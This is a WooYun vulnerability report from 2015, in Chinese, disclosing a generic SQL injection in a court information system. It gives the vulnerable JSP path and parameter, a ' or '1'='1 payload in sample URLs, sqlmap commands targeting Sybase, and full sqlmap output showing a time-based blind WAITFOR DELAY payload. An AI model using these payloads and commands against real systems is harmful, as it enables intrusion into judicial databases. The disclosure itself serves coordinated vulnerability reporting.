当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133734

漏洞标题:某在用法院系统通用型SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-08-15 12:46

修复时间:2015-11-15 14:58

公开时间:2015-11-15 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向第三方安全合作伙伴开放
2015-10-11: 细节向核心白帽子及相关领域专家公开
2015-10-21: 细节向普通白帽子公开
2015-10-31: 细节向实习白帽子公开
2015-11-15: 细节向公众公开

简要描述:

某在用法院系统通用型SQL注入

详细说明:

我之前提交的:http://**.**.**.**/bugs/wooyun-2015-0133424/trace/e7fb02e2b17b3529b7865d5eb5a62b77
审核大大说无法复现,我不清楚审核大大是怎么复现流程的,我这里提醒下,sqlmap中需要指定sybase,例如

sqlmap.py -u"http://**.**.**.**/sfpt/GeneralQuery.jsp?SelectCode=1" --dbms=sybase  
PS:请不要进入 extending provided level (1)


举例: http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**


我这里将每一个案例的测试截图全部附上:
1.http://**.**.**.**

11.jpg


2.http://**.**.**.**

12.jpg


13.jpg


3.http://**.**.**.**/

14.jpg


4.http://**.**.**.**

15.jpg


5.http://**.**.**.**

16.jpg


17.jpg


18.jpg


这个漏洞我提交过http://**.**.**.**/bugs/wooyun-2015-0133426/trace/6f57def60b4b71411dc60fb96f9255ed
但是审核大大说只有第一个能够复现……

注入点: sfpt/FORM/SF_PTTSYY/SF_PTTSYY.jsp


我再说一遍流程:
1.首先访问:

http://**.**.**.**/sfpt/FORM/SF_PTTSYY/
http://**.**.**.**/sfpt/FORM/SF_PTTSYY/
http://**.**.**.**/sfpt/FORM/SF_PTTSYY/
http://**.**.**.**/sfpt/FORM/SF_PTTSYY/
http://**.**.**.**/sfpt/FORM/SF_PTTSYY/


审核大大说第一个能成功,那么我们用第二个来做测试

21.jpg


http://**.**.**.**/sfpt/FORM/SF_PTTSYY/
我们点击“旁听庭审列表”
得到URL:

http://**.**.**.**/sfpt/FORM/PTTS/SelectList.jsp?java=jdk&yz012=%E4%BA%BA%E6%B0%91&hijkl=%E7%A7%B0%E7%AC%AC&stuvw=%E5%B9%B3%E5%8F%B0&mnopq=%E4%B8%AD%E7%BA%A7&lmnop=%E5%B9%B3%E5%8F%B0&bcdef=%E7%BA%A7%E4%BA%BA&SelectCode=SF_PTTS&sWhere=


之后随便选一个案件进入:

http://**.**.**.**/sfpt/FORM/SF_PTTSYY/SF_PTTSYY.jsp?ID=2C90F42CCB8C471DC67084690E97E1A163DFE8A095198DCA&REURL=1&TASKCODE=JOB2&WFOA_SKEY=&WINPOP=2


这里我们在TASKCODE后面添加' or '1'='1 其实就能看到效果了:

http://**.**.**.**/sfpt/FORM/SF_PTTSYY/SF_PTTSYY.jsp?ID=2C90F42CCB8C471DC67084690E97E1A163DFE8A095198DCA&REURL=1&TASKCODE=JOB2%27%20or%20%271%27=%271&WFOA_SKEY=&WINPOP=2


22.jpg


为了证明,我们还是扔进SQLMAP中:
这里为了SQLMAP的方便,我们在参数后面添加*
因此语句为(请无法复现的审核大大使用如下语句测试):

sqlmap.py -u "http://**.**.**.**/sfpt/FORM/SF_PTTSYY/SF_PTTSYY.jsp?ID=2C90F42CCB8C471DC67084690E97E1A163DFE8A095198DCA&REURL=1&TASKCODE=JOB2*&WFOA_SKEY=&WINPOP=2" --dbms=sybase


do you want to include all tests for 'Sybase' extending provided level (1) and r
isk (1)? [Y/n] n 这里选n即可

23.jpg


24.jpg


25.jpg


其他的也是一样的,例如:

http://**.**.**.**/sfpt/FORM/SF_PTTSYY/SF_PTTSYY.jsp?ID=E32254E529DA97A5A39893C7D0ABAC06453EF9CE552A91AA85803DE9FF1F8F04&REURL=1&TASKCODE=JOB2%27or%20%271%27=%271&WFOA_SKEY=&WINPOP=2


我估计审核大大使用了相同的ID,这是不行的,我们必须获取不同的网站所真实存在的ID才行!!

漏洞证明:

都在上面,

C:\Users\xxxaaa>sqlmap.py -u "http://**.**.**.**/sfpt/GeneralQu
ery.jsp?SelectCode=1" --dbms=sybase
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20140709}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 22:04:25
[22:04:26] [INFO] testing connection to the target URL
[22:04:26] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[22:04:29] [INFO] target URL is stable
[22:04:29] [INFO] testing if GET parameter 'SelectCode' is dynamic
[22:04:29] [WARNING] GET parameter 'SelectCode' does not appear dynamic
[22:04:30] [WARNING] heuristic (basic) test shows that GET parameter 'SelectCode
' might not be injectable
[22:04:30] [INFO] testing for SQL injection on GET parameter 'SelectCode'
do you want to include all tests for 'Sybase' extending provided level (1) and r
isk (1)? [Y/n] n
[22:04:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:04:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[22:04:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:04:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:04:59] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.
[22:05:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:05:29] [INFO] GET parameter 'SelectCode' seems to be 'Microsoft SQL Server/S
ybase time-based blind' injectable
[22:05:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:05:29] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[22:05:40] [INFO] checking if the injection point on GET parameter 'SelectCode'
is a false positive
GET parameter 'SelectCode' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N]
sqlmap identified the following injection points with a total of 66 HTTP(s) requ
ests:
---
Parameter: SelectCode (GET)
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: SelectCode=1' WAITFOR DELAY '0:0:5'--
---
[22:06:28] [INFO] testing Sybase
[22:06:28] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[22:06:57] [INFO] confirming Sybase
[22:07:08] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[22:07:08] [INFO] fetched data logged to text files under 'E:/sqlmap/output
\**.**.**.**'
[*] shutting down at 22:07:08

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-17 14:56

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供修复方案。同时,将相关案例下发给对应的CNCERT分中心,由其后续协调网站管理单位处置.

最新状态:

暂无